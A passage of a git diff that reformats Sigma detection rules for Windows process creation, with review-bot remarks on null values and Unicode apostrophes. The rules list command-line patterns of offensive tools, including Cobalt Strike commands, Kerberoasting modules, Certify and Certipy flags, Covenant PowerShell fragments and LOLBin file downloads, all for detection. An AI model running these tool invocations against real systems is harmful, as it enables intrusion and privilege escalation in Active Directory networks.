diff --git a/sigma/sysmon/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml b/sigma/sysmon/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml index eb9b7a4d4..f324c917c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml @@ -1,8 +1,7 @@ title: Arbitrary File Download Via GfxDownloadWrapper.EXE id: eee00933-a761-4cd0-be70-c42fe91731e7 status: test -description: Detects execution of GfxDownloadWrapper.exe with a URL as an argument - to download file. +description: Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file. references: - https://lolbas-project.github.io/lolbas/HonorableMentions/GfxDownloadWrapper/ author: Victor Sergeev, oscd.community @@ -21,11 +20,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \GfxDownloadWrapper.exe - CommandLine|contains: + CommandLine|contains: - http:// - https:// filter_main_known_urls: - CommandLine|contains: https://gameplayapi.intel.com/ + CommandLine|contains: https://gameplayapi.intel.com/ condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_git_susp_clone.yml b/sigma/sysmon/process_creation/proc_creation_win_git_susp_clone.yml index 298cc9f28..ab7087869 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_git_susp_clone.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_git_susp_clone.yml 
@@ -1,8 +1,7 @@ title: Suspicious Git Clone id: aef9d1f1-7396-4e92-a927-4567c7a495c1 status: test -description: Detects execution of "git" in order to clone a remote repository that - contain suspicious keywords which might be suspicious +description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious references: - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt author: Nasreddine Bencherchali (Nextron Systems) @@ -20,16 +19,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \git.exe - - \git-remote-https.exe - - OriginalFileName: git.exe + - Image|endswith: + - \git.exe + - \git-remote-https.exe + - OriginalFileName: git.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' clone ' - 'git-remote-https ' selection_keyword: - CommandLine|contains: + CommandLine|contains: + # Add more suspicious keywords - exploit - Vulns - vulnerability @@ -38,6 +38,7 @@ detection: - CVE- - poc- - ProofOfConcept + # Add more vuln names - proxyshell - log4shell - eternalblue diff --git a/sigma/sysmon/process_creation/proc_creation_win_googleupdate_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_googleupdate_susp_child_process.yml index d3733d363..8d42ba15c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_googleupdate_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_googleupdate_susp_child_process.yml @@ -1,8 +1,8 @@ title: Potentially Suspicious GoogleUpdate Child Process id: 84b1ecf9-6eff-4004-bafb-bae5c0e251b2 related: - - id: bdbab15a-3826-48fa-a1b7-723cd8f32fcc - type: derived + - id: bdbab15a-3826-48fa-a1b7-723cd8f32fcc + type: derived status: experimental description: Detects potentially suspicious child processes of "GoogleUpdate.exe" references: 
@@ -23,13 +23,14 @@ detection: selection: ParentImage|endswith: \GoogleUpdate.exe filter_main_known_legit: - - Image|contains: \Google - - Image|endswith: - - \setup.exe - - chrome_updater.exe - - chrome_installer.exe + # Some other legit child process might exist. It's better to make a baseline before running this in production + - Image|contains: \Google # Example: GoogleUpdate.exe, GoogleCrashHandler.exe, GoogleUpdateComRegisterShell64.exe + - Image|endswith: + - \setup.exe + - chrome_updater.exe + - chrome_installer.exe filter_main_image_null: - Image: null + Image: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_gpg4win_decryption.yml b/sigma/sysmon/process_creation/proc_creation_win_gpg4win_decryption.yml index b71336e2f..1c8a24988 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_gpg4win_decryption.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_gpg4win_decryption.yml @@ -19,12 +19,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_metadata: - - Image|endswith: - - \gpg.exe - - \gpg2.exe - - Description: "GnuPG\u2019s OpenPGP tool" + - Image|endswith: + - \gpg.exe + - \gpg2.exe + - Description: GnuPG’s OpenPGP tool selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -d ' - passphrase condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_gpg4win_encryption.yml b/sigma/sysmon/process_creation/proc_creation_win_gpg4win_encryption.yml index cd8759758..c46b54fe7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_gpg4win_encryption.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_gpg4win_encryption.yml 
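Review bot: Dropping the explicit `null` in `filter_main_image_null` (`Image:` instead of `Image: null`) parses to the same value but hides intent; an empty scalar reads like an unfinished edit, and the Sigma specification documents null matching with the literal `null`. Keep `Image: null` here, and likewise `CommandLine: null` in the `filter_null` hunk of proc_creation_win_gup_arbitrary_binary_execution.yml further down. The baseline comment added above `filter_main_known_legit` is a good addition and needs no change.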
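Review bot: `Description: GnuPG’s OpenPGP tool` now carries a raw U+2019 right single quotation mark where the old line had the visible escape `\u2019`; as a plain scalar the character is indistinguishable on screen from an ASCII apostrophe, so an editor's quote normalisation or a copy-paste would silently change the value the rule matches against. Either keep the quoted escaped form or mark the character, e.g. `- Description: GnuPG’s OpenPGP tool # apostrophe is U+2019, not ASCII '`. The same edit appears in proc_creation_win_gpg4win_encryption.yml, proc_creation_win_gpg4win_portable_execution.yml and proc_creation_win_gpg4win_susp_location.yml, so whichever form is chosen should be applied to all four.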
@@ -19,12 +19,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_metadata: - - Image|endswith: - - \gpg.exe - - \gpg2.exe - - Description: "GnuPG\u2019s OpenPGP tool" + - Image|endswith: + - \gpg.exe + - \gpg2.exe + - Description: GnuPG’s OpenPGP tool selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -c ' - passphrase condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_gpg4win_portable_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_gpg4win_portable_execution.yml index 82d1fca56..57d30e399 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_gpg4win_portable_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_gpg4win_portable_execution.yml @@ -1,8 +1,7 @@ title: Portable Gpg.EXE Execution id: 77df53a5-1d78-4f32-bc5a-0e7465bd8f41 status: experimental -description: Detects the execution of "gpg.exe" from uncommon location. Often used - by ransomware and loaders to decrypt/encrypt data. +description: Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data. references: - https://www.trendmicro.com/vinfo/vn/threat-encyclopedia/malware/ransom.bat.zarlock.a - https://securelist.com/locked-out/68960/ @@ -22,11 +21,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: - - \gpg.exe - - \gpg2.exe - - OriginalFileName: gpg.exe - - Description: "GnuPG\u2019s OpenPGP tool" + - Image|endswith: + - \gpg.exe + - \gpg2.exe + - OriginalFileName: gpg.exe + - Description: GnuPG’s OpenPGP tool filter_main_legit_location: Image|contains: - :\Program Files (x86)\GNU\GnuPG\bin\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_gpg4win_susp_location.yml b/sigma/sysmon/process_creation/proc_creation_win_gpg4win_susp_location.yml index 0a30bf328..9f7c4a2fd 100644 
--- a/sigma/sysmon/process_creation/proc_creation_win_gpg4win_susp_location.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_gpg4win_susp_location.yml @@ -1,8 +1,7 @@ title: File Encryption/Decryption Via Gpg4win From Suspicious Locations id: e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d status: experimental -description: Detects usage of Gpg4win to encrypt/decrypt files located in potentially - suspicious locations. +description: Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations. references: - https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html - https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/ @@ -20,15 +19,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_metadata: - - Image|endswith: - - \gpg.exe - - \gpg2.exe - - Product: GNU Privacy Guard (GnuPG) - - Description: "GnuPG\u2019s OpenPGP tool" + - Image|endswith: + - \gpg.exe + - \gpg2.exe + - Product: GNU Privacy Guard (GnuPG) + - Description: GnuPG’s OpenPGP tool selection_cli: - CommandLine|contains: -passphrase + CommandLine|contains: -passphrase selection_paths: - CommandLine|contains: + CommandLine|contains: - :\PerfLogs\ - :\Temp\ - :\Users\Public\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_gpresult_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_gpresult_execution.yml index f5c5d813c..53106d921 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_gpresult_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_gpresult_execution.yml 
@@ -1,8 +1,7 @@ title: Gpresult Display Group Policy Information id: e56d3073-83ff-4021-90fe-c658e0709e72 status: test -description: Detects cases in which a user uses the built-in Windows utility gpresult - to display the Resultant Set of Policy (RSoP) information +description: Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult @@ -23,7 +22,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \gpresult.exe - CommandLine|contains: + CommandLine|contains: - /z - /v condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml index 6757580a7..7d254de5f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml @@ -1,8 +1,7 @@ title: Arbitrary Binary Execution Using GUP Utility id: d65aee4d-2292-4cea-b832-83accd6cfa43 status: test -description: Detects execution of the Notepad++ updater (gup) to launch other commands - or executables +description: Detects execution of the Notepad++ updater (gup) to launch other commands or executables references: - https://twitter.com/nas_bench/status/1535322445439180803 author: Nasreddine Bencherchali (Nextron Systems) 
@@ -23,11 +22,11 @@ detection: Image|endswith: \explorer.exe filter: Image|endswith: \explorer.exe - CommandLine|contains: \Notepad++\notepad++.exe + CommandLine|contains: \Notepad++\notepad++.exe filter_parent: ParentImage|contains: \Notepad++\updater\ filter_null: - CommandLine: null + CommandLine: condition: process_creation and (selection and not 1 of filter*) falsepositives: - Other parent binaries using GUP not currently identified diff --git a/sigma/sysmon/process_creation/proc_creation_win_gup_download.yml b/sigma/sysmon/process_creation/proc_creation_win_gup_download.yml index 53f99df3d..801cd9d71 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_gup_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_gup_download.yml @@ -1,8 +1,7 @@ title: File Download Using Notepad++ GUP Utility id: 44143844-0631-49ab-97a0-96387d6b2d7c status: test -description: Detects execution of the Notepad++ updater (gup) from a process other - than Notepad++ to download files. +description: Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files. references: - https://twitter.com/nas_bench/status/1535322182863179776 author: Nasreddine Bencherchali (Nextron Systems) @@ -20,17 +19,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \GUP.exe - - OriginalFileName: gup.exe + - Image|endswith: \GUP.exe + - OriginalFileName: gup.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -unzipTo ' - http filter: ParentImage|endswith: \notepad++.exe condition: process_creation and (all of selection* and not filter) falsepositives: - - Other parent processes other than notepad++ using GUP that are not currently - identified + - Other parent processes other than notepad++ using GUP that are not currently identified level: high ruletype: Sigma 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_gup_suspicious_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_gup_suspicious_execution.yml index 11d28732d..b74f67e4d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_gup_suspicious_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_gup_suspicious_execution.yml @@ -1,8 +1,7 @@ title: Suspicious GUP Usage id: 0a4f6091-223b-41f6-8743-f322ec84930b status: test -description: Detects execution of the Notepad++ updater in a suspicious directory, - which is often used in DLL side-loading attacks +description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks references: - https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/process_creation/proc_creation_win_hh_chm_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_hh_chm_execution.yml index 99b221d38..de8958719 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hh_chm_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hh_chm_execution.yml @@ -21,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: HH.exe - - Image|endswith: \hh.exe + - OriginalFileName: HH.exe + - Image|endswith: \hh.exe selection_cli: - CommandLine|contains: .chm + CommandLine|contains: .chm condition: process_creation and (all of selection_*) falsepositives: - False positives are expected with legitimate ".CHM" diff --git a/sigma/sysmon/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml index 05e4bb1d3..96be7e010 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml @@ -1,8 +1,7 @@ title: Remote CHM File Download/Execution Via HH.EXE id: f57c58b3-ee69-4ef5-9041-455bf39aaa89 status: experimental -description: Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" - files. +description: Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files. references: - https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html - https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: HH.exe - - Image|endswith: \hh.exe + - OriginalFileName: HH.exe + - Image|endswith: \hh.exe selection_cli: - CommandLine|contains: http + CommandLine|contains: http condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_hh_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_hh_susp_execution.yml index b8fed55c4..5fd8f5422 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hh_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hh_susp_execution.yml @@ -34,16 +34,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: HH.exe - - Image|endswith: \hh.exe + - OriginalFileName: HH.exe + - Image|endswith: \hh.exe selection_paths: - CommandLine|contains: + CommandLine|contains: - .application - \AppData\Local\Temp\ - \Content.Outlook\ - \Downloads\ - \Users\Public\ - \Windows\Temp\ + # - '\AppData\Local\Temp\Temp?_' + # - '\AppData\Local\Temp\Rar$' + # - '\AppData\Local\Temp\7z' + # - '\AppData\Local\Temp\wz' + # - '\AppData\Local\Temp\peazip-tmp' condition: process_creation and (all of selection_*) falsepositives: - Unknown 
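Review bot: The five commented-out `\AppData\Local\Temp\…` entries added under `selection_paths` carry no explanation of why they are disabled, so a later maintainer cannot tell whether they are untested candidates, known false-positive sources, or leftovers. Add a one-line reason above the block, for example `# Candidate archive-extraction temp paths; kept disabled until their false-positive rate has been checked` if that is the motivation, or remove them and track them elsewhere. If they are later enabled, note that `?` in `Temp?_` is a Sigma single-character wildcard, presumably intended for the variable digit in that folder name.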
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_adcspwn.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_adcspwn.yml index bd1595bab..82375fe4e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_adcspwn.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_adcspwn.yml @@ -1,9 +1,7 @@ title: HackTool - ADCSPwn Execution id: cd8c163e-a19b-402e-bdd5-419ff5859f12 status: test -description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges - in an active directory network by coercing authenticate from machine accounts - and relaying to the certificate service +description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service references: - https://github.com/bats3c/ADCSPwn author: Florian Roth (Nextron Systems) @@ -21,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' --adcs ' - ' --port ' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml index dec0ce9e8..91d93ae19 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml @@ -1,8 +1,7 @@ title: HackTool - Bloodhound/Sharphound Execution id: f376c8a7-a2d0-4ddc-aa0c-16c17236d962 status: test -description: Detects command line parameters used by Bloodhound and Sharphound hack - tools +description: Detects command line parameters used by Bloodhound and Sharphound hack tools references: - https://github.com/BloodHoundAD/BloodHound - https://github.com/BloodHoundAD/SharpHound 
@@ -27,16 +26,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Product|contains: SharpHound - - Description|contains: SharpHound - - Company|contains: - - SpecterOps - - evil corp - - Image|contains: - - \Bloodhound.exe - - \SharpHound.exe + - Product|contains: SharpHound + - Description|contains: SharpHound + - Company|contains: + - SpecterOps + - evil corp + - Image|contains: + - \Bloodhound.exe + - \SharpHound.exe selection_cli_1: - CommandLine|contains: + CommandLine|contains: - ' -CollectionMethod All ' - ' --CollectionMethods Session ' - ' --Loop --Loopduration ' @@ -45,11 +44,11 @@ detection: - Invoke-Bloodhound - Get-BloodHoundData selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - ' -JsonFolder ' - ' -ZipFileName ' selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - ' DCOnly ' - ' --NoSaveCache ' condition: process_creation and (1 of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml index 687f3656f..6f3fc5625 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml @@ -19,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32.exe - .dll - StartNodeRelay diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_certify.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_certify.yml index 7ef622e64..a678fa8bb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_certify.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_certify.yml 
@@ -1,8 +1,7 @@ title: HackTool - Certify Execution id: 762f2482-ff21-4970-8939-0aa317a886bb status: experimental -description: Detects Certify a tool for Active Directory certificate abuse based on - PE metadata characteristics and common command line arguments. +description: Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments. references: - https://github.com/GhostPack/Certify author: pH-T (Nextron Systems) @@ -21,18 +20,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \Certify.exe - - OriginalFileName: Certify.exe - - Description|contains: Certify + - Image|endswith: \Certify.exe + - OriginalFileName: Certify.exe + - Description|contains: Certify selection_cli_commands: - CommandLine|contains: + CommandLine|contains: - '.exe cas ' - '.exe find ' - '.exe pkiobjects ' - '.exe request ' - '.exe download ' selection_cli_options: - CommandLine|contains: + CommandLine|contains: - ' /vulnerable' - ' /template:' - ' /altname:' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_certipy.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_certipy.yml index e7bd2e6e0..ff5860544 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_certipy.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_certipy.yml @@ -1,8 +1,7 @@ title: HackTool - Certipy Execution id: 6938366d-8954-4ddc-baff-c830b3ba8fcd status: experimental -description: Detects Certipy a tool for Active Directory Certificate Services enumeration - and abuse based on PE metadata characteristics and common command line arguments. +description: Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments. references: - https://github.com/ly4k/Certipy author: pH-T (Nextron Systems) 
@@ -20,11 +19,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \Certipy.exe - - OriginalFileName: Certipy.exe - - Description|contains: Certipy + - Image|endswith: \Certipy.exe + - OriginalFileName: Certipy.exe + - Description|contains: Certipy selection_cli_commands: - CommandLine|contains: + CommandLine|contains: - ' auth ' - ' find ' - ' forge ' @@ -32,7 +31,7 @@ detection: - ' req ' - ' shadow ' selection_cli_flags: - CommandLine|contains: + CommandLine|contains: - ' -bloodhound' - ' -ca-pfx ' - ' -dc-ip ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml index e7d0693fc..e76a78eb3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml @@ -1,11 +1,10 @@ title: Operator Bloopers Cobalt Strike Commands id: 647c7b9e-d784-4fda-b9a0-45c565a7b729 related: - - id: 4f154fb6-27d1-4813-a759-78b93e0b9c48 - type: similar + - id: 4f154fb6-27d1-4813-a759-78b93e0b9c48 + type: similar status: test -description: Detects use of Cobalt Strike commands accidentally entered in the CMD - shell +description: Detects use of Cobalt Strike commands accidentally entered in the CMD shell references: - https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf - https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/ 
@@ -26,14 +25,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: Cmd.Exe - - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe selection_cli: - CommandLine|startswith: + CommandLine|startswith: - 'cmd ' - cmd.exe - c:\windows\system32\cmd.exe - CommandLine|contains: + CommandLine|contains: - psinject - spawnas - make_token diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml index f430ad339..955d7c86e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml @@ -1,8 +1,8 @@ title: Operator Bloopers Cobalt Strike Modules id: 4f154fb6-27d1-4813-a759-78b93e0b9c48 related: - - id: 647c7b9e-d784-4fda-b9a0-45c565a7b729 - type: similar + - id: 647c7b9e-d784-4fda-b9a0-45c565a7b729 + type: similar status: test description: Detects Cobalt Strike module/commands accidentally entered in CMD shell references: @@ -24,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: Cmd.Exe - - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - Invoke-UserHunter - Invoke-ShareFinder - Invoke-Kerberoast diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml index 707ccf61f..94e390bdd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml 
@@ -1,8 +1,7 @@ title: CobaltStrike Load by Rundll32 id: ae9c6a7c-9521-42a6-915e-5aaa8689d529 status: test -description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs - from the command line. +description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line. references: - https://www.cobaltstrike.com/help-windows-executable - https://redcanary.com/threat-detection-report/ @@ -22,14 +21,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_rundll: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE - - CommandLine|contains: - - rundll32.exe - - 'rundll32 ' + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: + - rundll32.exe + - 'rundll32 ' selection_params: - CommandLine|contains: .dll - CommandLine|endswith: + CommandLine|contains: .dll + CommandLine|endswith: - ' StartW' - ',StartW' condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml index 909e7766c..837615d63 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml 
@@ -20,23 +20,23 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_generic_1: - CommandLine|endswith: cmd.exe /C whoami + CommandLine|endswith: cmd.exe /C whoami ParentImage|startswith: C:\Temp\ selection_generic_2: ParentImage|endswith: - \runonce.exe - \dllhost.exe - CommandLine|contains|all: + CommandLine|contains|all: - cmd.exe /c echo - '> \\\\.\\pipe' selection_conhost_1: ParentCommandLine|contains|all: - cmd.exe /C echo - ' > \\\\.\\pipe' - CommandLine|endswith: conhost.exe 0xffffffff -ForceV1 + CommandLine|endswith: conhost.exe 0xffffffff -ForceV1 selection_conhost_2: ParentCommandLine|endswith: /C whoami - CommandLine|endswith: conhost.exe 0xffffffff -ForceV1 + CommandLine|endswith: conhost.exe 0xffffffff -ForceV1 condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_coercedpotato.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_coercedpotato.yml index dfb45aab7..6c42aeb2b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_coercedpotato.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_coercedpotato.yml 
@@ -22,16 +22,16 @@ detection: selection_loader_img: Image|endswith: \CoercedPotato.exe selection_params: - CommandLine|contains: ' --exploitId ' + CommandLine|contains: ' --exploitId ' selection_loader_imphash: - - Imphash: - - a75d7669db6b2e107a44c4057ff7f7d6 - - f91624350e2c678c5dcbe5e1f24e22c9 - - 14c81850a079a87e83d50ca41c709a15 - - Hashes: - - IMPHASH=A75D7669DB6B2E107A44C4057FF7F7D6 - - IMPHASH=F91624350E2C678C5DCBE5E1F24E22C9 - - IMPHASH=14C81850A079A87E83D50CA41C709A15 + - Imphash: + - a75d7669db6b2e107a44c4057ff7f7d6 + - f91624350e2c678c5dcbe5e1f24e22c9 + - 14c81850a079a87e83d50ca41c709a15 + - Hashes: + - IMPHASH=A75D7669DB6B2E107A44C4057FF7F7D6 + - IMPHASH=F91624350E2C678C5DCBE5E1F24E22C9 + - IMPHASH=14C81850A079A87E83D50CA41C709A15 condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_covenant.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_covenant.yml index 218d2d309..aa209d25c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_covenant.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_covenant.yml @@ -21,16 +21,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - -Sta - -Nop - -Window - Hidden - CommandLine|contains: + CommandLine|contains: - -Command - -EncodedCommand selection_2: - CommandLine|contains: + CommandLine|contains: - 'sv o (New-Object IO.MemorySteam);sv d ' - mshta file.hta - GruntHTTP diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml index 1db66d434..e9d3c7aac 100644 --- 